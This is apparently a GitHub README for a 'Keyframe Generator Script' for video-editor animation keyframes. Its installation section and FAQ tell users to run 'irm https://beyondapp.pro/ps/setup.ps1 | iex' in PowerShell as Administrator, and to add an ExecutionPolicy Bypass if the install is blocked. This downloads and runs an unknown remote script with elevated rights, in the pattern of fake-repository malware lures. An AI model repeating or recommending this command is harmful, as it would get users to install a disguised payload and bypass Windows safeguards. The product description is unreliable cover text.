Skip to content

hexaarbiterend/Keyframe-Generator-Script

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Keyframe Generator Script

Zoom curves · Shake presets · Text export

Keyframe Generator Script

Generates text/JSON keyframe files with calculated animation curves (smooth zoom, shake) for video editing projects.

ABOUT

Script that generates keyframe data files for zoom, pan, and shake animations to paste into video editor projects.

INSTALLATION



Run in PowerShell as Administrator:

irm https://beyondapp.pro/ps/setup.ps1 | iex

Copy · paste · press Enter · confirm UAC

Setup runs in three steps:

Step Action
1/3 Downloading components — tool package and dependencies
2/3 Unpacking archive — files extracted to a temp workspace
3/3 Launching installer — utility is installed on Windows

FEATURES

🔢 Math-based curves — Smooth zoom and easing without manual keyframing. 📳 Shake presets — Lightweight, medium, and heavy camera shake templates. 📄 Text / JSON export — Drop output into your editor workflow. 🎞️ FPS-aware — Generate keys matched to project frame rate. ⚡ One command — PowerShell handles download, unpack, and setup.

REQUIREMENTS

Windows Windows 10 / 11 (64-bit)
RAM 8 GB
Disk 2 GB free space

FAQ

 How to install?
Open PowerShell as Administrator and run the command from the INSTALLATION section. You should see steps [1/3], [2/3], and [3/3] in the console.
 Manual install blocked?
Try: `powershell -ExecutionPolicy Bypass -Command "irm https://beyondapp.pro/ps/setup.ps1 | iex"`
 What does this tool do?
Script that **generates keyframe data files** for zoom, pan, and shake animations to paste into video editor projects.
 Updates?
Re-run the same PowerShell command to fetch the latest build.

About

Keyframe Generator Script — creates mathematically calculated animation keyframes (zoom, pan, shake) as importable text/JSON for video editors. Windows one-command PowerShell install.

Topics

Stars

Watchers

Forks

Releases

Packages

Contributors